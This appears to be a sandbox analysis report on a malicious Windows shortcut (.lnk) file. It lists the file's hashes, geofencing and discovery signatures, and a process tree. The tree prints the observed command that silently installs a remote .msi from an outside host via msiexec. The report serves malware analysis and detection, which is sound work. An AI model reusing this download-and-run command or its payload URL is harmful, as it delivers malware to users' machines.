Overview

overview

7

Static

static

1

aedf0fea2e...9e.lnk

windows7-x64

7

aedf0fea2e...9e.lnk

windows10-2004-x64

7

Resubmissions

19/11/2024, 13:47

241119-q32g8s1pen 7

19/11/2024, 13:47

241119-q3kjqaxdrj 7

Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 13:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e.lnk

  • Size

    948B

  • MD5

    0879d4ade73bc83521fb8dc947cd3219

  • SHA1

    304e8ad232651e6a0116744748dfa1b2587e5407

  • SHA256

    aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e

  • SHA512

    2c982d02b5b28bf71c68da088047c02c30b97739b7a56ebb4c2a41a2e33e965bcdd191f0684308d2d1bf9b7a992d29f16148a83219e6adb2d7f567ff89ea2501

Score
7/10
discovery

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i https://sextamsi.b-cdn.net/17.msi /quiet /norestart ALLUSERS=1 /lv* unzippingPEDIDONF101204.lnk.txt
      2⤵
      • Use of msiexec (install) with remote resource
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:4500
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:3556

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\unzippingPEDIDONF101204.lnk.txt
    Filesize

    1KB

    MD5

    c47e8afafd568a1d47482385721680ef

    SHA1

    8bf247110672fe135779695b1314718303dbf2b1

    SHA256

    b4628d6323a823bda5442fd72f4255b6a4ff4aed35eb8808c1e6ae5673974acb

    SHA512

    a1f81408474f85a67ec2a675dc339bf84015afca102515bd85a2ceb9c4b6cd34a33a386875b4ad5de6377803faf17935a298848528679e312bc716f9f4125bd0

    Download Submit